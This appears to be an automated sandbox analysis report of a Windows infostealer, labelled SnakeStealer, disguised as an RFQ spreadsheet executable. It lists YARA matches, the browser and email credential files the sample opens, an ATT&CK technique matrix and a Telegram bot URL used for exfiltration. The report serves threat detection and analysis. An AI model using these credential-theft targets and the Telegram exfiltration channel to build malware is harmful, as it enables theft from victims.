                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    Source: Yara match | File source: 00000005.00000002.2990704063.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.418f712.3.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4258950.5.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4215892.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.418f712.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4109562.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.414c642.4.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4258950.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4109562.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.414c642.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4215892.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000005.00000002.2988851400.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.2474193722.0000000004109000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.2474193722.0000000004215000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe PID: 7380, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: InstallUtil.exe PID: 7968, type: MEMORYSTR
                    Source: Yara match | File source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.418f712.3.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4258950.5.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4215892.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.418f712.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4109562.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.414c642.4.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4258950.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4109562.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.414c642.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4215892.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000005.00000002.2988851400.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.2474193722.0000000004109000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.2474193722.0000000004215000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe PID: 7380, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: InstallUtil.exe PID: 7968, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: Yara match | File source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.418f712.3.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.414c642.4.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4258950.5.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4215892.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.418f712.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4109562.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4258950.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4109562.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.414c642.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4215892.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000005.00000002.2988851400.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000005.00000002.2990704063.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.2474193722.0000000004109000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.2474193722.0000000004215000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe PID: 7380, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: InstallUtil.exe PID: 7968, type: MEMORYSTR

                    Remote Access Functionality

                    Source: Yara match; File source: 00000005.00000002.2990704063.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.418f712.3.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4258950.5.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4215892.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.418f712.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4109562.1.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.414c642.4.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4258950.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4109562.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.414c642.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4215892.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 00000005.00000002.2988851400.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000000.00000002.2474193722.0000000004109000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000000.00000002.2474193722.0000000004215000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: Process Memory Space: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe PID: 7380, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: InstallUtil.exe PID: 7968, type: MEMORYSTR
                    Source: Yara match; File source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.418f712.3.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4258950.5.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4215892.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.418f712.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4109562.1.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.414c642.4.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4258950.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4109562.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.414c642.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4215892.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 00000005.00000002.2988851400.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000000.00000002.2474193722.0000000004109000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000000.00000002.2474193722.0000000004215000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: Process Memory Space: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe PID: 7380, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: InstallUtil.exe PID: 7968, type: MEMORYSTR
                    Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                    Gather Victim Identity Information | Acquire Infrastructure | 1 Valid Accounts | Windows Management Instrumentation | 1 Valid Accounts | 1 Valid Accounts | 1 Masquerading | 1 OS Credential Dumping | 1 Security Software Discovery | Remote Services | 1 Email Collection | 1 Web Service | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                    Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 1 Access Token Manipulation | 1 Valid Accounts | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                    Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 211 Process Injection | 1 Access Token Manipulation | Security Account Manager | 31 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 3 Ingress Tool Transfer | Automated Exfiltration | Data Encrypted for Impact
                    Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 DLL Side-Loading | 1 Disable or Modify Tools | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
                    Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 31 Virtualization/Sandbox Evasion | LSA Secrets | 1 System Network Configuration Discovery | SSH | Keylogging | 14 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
                    Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 211 Process Injection | Cached Domain Credentials | 13 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                    DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Hidden Files and Directories | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                    Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 3 Obfuscated Files or Information | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                    Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Software Packing | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                    IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 1 DLL Side-Loading | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet



                    Source | Detection | Scanner | Label | Link
                    RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | 37% | ReversingLabs | ByteCode-MSIL.Trojan.SnakeStealer |
                    RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | 100% | Joe Sandbox ML | |
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
                    Source | Detection | Scanner | Label | Link
                    http://www.founder.com.cn/cn/ | 0% | Avira URL Cloud | safe |
                    http://ocsp.sectigo.com0 | 0% | Avira URL Cloud | safe |
                    Name | IP | Active | Malicious | Antivirus Detection | Reputation
                    reallyfreegeoip.org | 104.21.48.1 | true | false | | high
                    api.telegram.org | 149.154.167.220 | true | false | | high
                    checkip.dyndns.com | 193.122.130.0 | true | false | | high
                    checkip.dyndns.org | unknown | unknown | false | | high
                    Name | Malicious | Antivirus Detection | Reputation
                    https://reallyfreegeoip.org/xml/8.46.123.189 | false | | high
                    http://checkip.dyndns.org/ | false | | high
                    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:813435%0D%0ADate%20and%20Time:%2010/01/2025%20/%2014:05:34%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20813435%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | | high
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://duckduckgo.com/chrome_newtabInstallUtil.exe, 00000005.00000002.2994301420.0000000003E6A000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://www.fontbureau.com/designersGRFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://duckduckgo.com/ac/?q=InstallUtil.exe, 00000005.00000002.2994301420.0000000003E6A000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exefalse
                                          high
                                          http://www.fontbureau.com/designers/?RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://www.founder.com.cn/cn/bTheRFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://api.telegram.orgInstallUtil.exe, 00000005.00000002.2990704063.0000000002C83000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exefalse
                                                  high
                                                  http://ocsp.sectigo.com0RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exefalse
                                                    high
                                                    https://api.telegram.org/botRFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2474193722.0000000004215000.00000004.00000800.00020000.00000000.sdmp, RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2474193722.0000000004109000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2990704063.0000000002C83000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2988851400.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                      high
